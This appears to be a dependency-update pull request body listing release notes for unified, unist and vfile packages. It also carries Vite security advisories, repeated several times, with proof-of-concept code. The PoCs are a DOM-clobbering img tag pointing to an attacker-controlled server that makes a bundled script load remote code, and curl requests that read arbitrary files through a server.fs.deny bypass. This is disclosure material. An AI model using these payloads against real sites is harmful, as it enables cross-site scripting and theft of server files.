Full Changelog: 2.4.1...2.5.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 71 commits:

↗️ type-fest (indirect, 0.13.1 → 4.30.2) · Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 3 commits:

↗️ unified (indirect, 10.1.2 → 11.0.5) · Repo · Changelog

Release Notes

11.0.5

Fix

Full Changelog: 11.0.4...11.0.5

11.0.4

Types

Full Changelog: 11.0.3...11.0.4

11.0.3

Fix

  • 8dee2ab Fix support for functions in data

Full Changelog: 11.0.2...11.0.3

11.0.2

  • cea788b Fix type of settings if nothing is registered yet

Full Changelog: 11.0.1...11.0.2

11.0.1

  • d1a915d Fix incorrect type of settings in presets

Full Changelog: 11.0.0...11.0.1

11.0.0

Change

  • baf80b2 Change to require Node.js 16
    migrate: update too
  • dd9834a Update @types/unist
    migrate: update too
  • 620ccf9 Update vfile
    migrate: update too

Change (unlikey to affect you)

  • a44db46 Add Data, Settings types to augment shared data
    migrate: if you deal with data, type it, see commit for info
  • fb49556 Change to replace Buffer with Uint8Array
    migrate: you’re probably fine unless you use weird encodings, see commit for details if so
  • f3e71a8 Remove Attacher type
    migrate: use Plugin instead
  • cc53bb6 Remove FrozenProcessor type
    migrate: use Processor instead
  • 1aa3494 Change to yield undefined, not null
    migrate: expect undefined
  • 932c140 Change to use exports
    migrate: don’t use private APIs
  • 8e57478 Remove support for classes as compilers, parsers
    migrate: if you love classes, see commit message
  • 4676814 Remove support for compilers returning nullish
    migrate: nobody did that
  • 807ffb9 Add improved types
    migrate: it’s probably just better if anything changed at all
  • b35afe0 Add useful error on empty presets
    by @wooorm in #202
  • 6f068a0 Fix to deep clone preset settings
  • 56ee288 Fix non-first parameter merging when reconfiguring plugins

Misc

Full Changelog: 10.1.2...11.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 65 commits:

↗️ unist-util-is (indirect, 5.1.1 → 6.0.0) · Repo

Release Notes

6.0.0

Changes

  • cd152e7 Update @types/unist
    migrate: update @types/unist too
  • 8a2febe Change to require Node.js 16
    migrate: update Node
  • f91a1c2 Change to use export map
    migrate: don’t use private APIs
  • dc59467 Change types to work w/o explicit type parameter
    migrate: don’t pass an explicit type parameter;
    replace AssertAnything, AssertPredicate -> Check;
    TestFunctionAnything, TestFunctionPredicate -> TestFunction;
    PredicateTest -> Test

Full Changelog: 5.2.1...6.0.0

5.2.1

Misc

Full Changelog: 5.2.0...5.2.1

5.2.0

Add

  • 262c28f Add export of PredicateTest type

Misc

Full Changelog: 5.1.1...5.2.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 29 commits:

↗️ unist-util-modify-children (indirect, 3.1.0 → 4.0.0) · Repo

Release Notes

4.0.0

Change

  • d8fae1c Update @types/unist
    migrate: update too
  • 2e92449 Change to require Node.js 16
    migrate: update too
  • 5bec8ab Change to use export map
    migrate: don’t use private APIs

Full Changelog: 3.1.1...4.0.0

3.1.1

Misc

Full Changelog: 3.1.0...3.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 18 commits:

↗️ unist-util-position (indirect, 4.0.3 → 5.0.0) · Repo

Release Notes

5.0.0

Change

  • 4049b1f Update @types/unist
    migrate: update too
  • 91eee7f Change to require Node.js 16
    migrate: update too
  • fda0351 Change to use export map
    migrate: don’t use private APIs
  • e396010 Change to return undefined for invalid points, positions
    by @wooorm in #12
    migrate: expect undefined

Full Changelog: 4.0.4...5.0.0

4.0.4

Misc

Full Changelog: 4.0.3...4.0.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 22 commits:

↗️ unist-util-remove-position (indirect, 4.0.1 → 5.0.0) · Repo

Release Notes

5.0.0

Change

  • f18d159 Update @types/unist
    migrate: update too
  • 24ea478 Change to require Node.js 16
    migrate: update too
  • 15b015e Change to use export map
    migrate: don’t use private APIs
  • fa86ae2 Change to yield undefined
    migrate: expect undefined
  • 910f1bb Change to remove force shortcut
    migrate: true -> {force: true}

Full Changelog: 4.0.2...5.0.0

4.0.2

Misc

Full Changelog: 4.0.1...4.0.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 27 commits:

↗️ unist-util-visit (indirect, 4.1.1 → 5.0.0) · Repo

Release Notes

5.0.0

Change

  • 4dcff31 Update @types/unist
    migrate: update too
  • befc0b3 Change to require Node.js 16
    migrate: update too
  • b5f36de Change to use export map
    migrate: don’t use private APIs
  • 89fc050 Change to remove complex-types.d.ts
    migrate: use main export
  • 12c9ee9 Change to pass undefined, not null
    migrate: change null to undefined

Fix

  • 3cb2732 Fix performance of InclusiveDescendant type

Full Changelog: 4.1.2...5.0.0

4.1.2

Misc

Full Changelog: 4.1.1...4.1.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 23 commits:

↗️ unist-util-visit-children (indirect, 2.0.1 → 3.0.0) · Repo

Release Notes

3.0.0

Change

  • e3f568b Update @types/unist
    migrate: update too
  • 8a28747 Change to use export map
    migrate: update too
  • 707e7bc Change to require Node.js 16
    migrate: don’t use private APIs

Full Changelog: 2.0.2...3.0.0

2.0.2

Misc

Full Changelog: 2.0.1...2.0.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

↗️ unist-util-visit-parents (indirect, 5.1.1 → 6.0.1) · Repo

Release Notes

6.0.1

Fix

  • 48f0dc0 Fix TSC generating broken .d.ts files

Full Changelog: 6.0.0...6.0.1

5.1.3

  • 529f064 Fix hidden types for unist-util-visit

Full Changelog: 5.1.2...5.1.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 28 commits:

↗️ vfile (indirect, 5.3.6 → 6.0.3) · Repo · Changelog

Release Notes

6.0.3

Full Changelog: 6.0.2...6.0.3

6.0.2

Performance

  • aeae47e Refactor to prevent calling cwd if not needed

Miscellaneous

  • f364b8f Refactor to use import maps
Types

Full Changelog: 6.0.1...6.0.2

6.0.1

Types

Full Changelog: 6.0.0...6.0.1

6.0.0

Change

  • 46dd635 Change to require Node.js 16
    migrate: update Node
  • f72469b Change to use export map
    migrate: don’t use private APIs
  • f4edd0d Change to replace Buffer with Uint8Array
    migrate: this will mostly work, but might break if you use weird ancient encodings
    by @wooorm in #85
  • af5eada Update vfile-message
    migrate: if you used .position on messages, switch that to .place
    optionally use the nicer options parameter to pass your things

Misc

Full Changelog: 5.3.7...6.0.0

5.3.7

Misc

Full Changelog: 5.3.6...5.3.7

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 47 commits:

↗️ vite (indirect, 3.2.4 → 6.0.3) · Repo · Changelog

Security Advisories 🚨

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite's `server.fs.deny` is bypassed when using `?import&raw`

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

🚨 Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

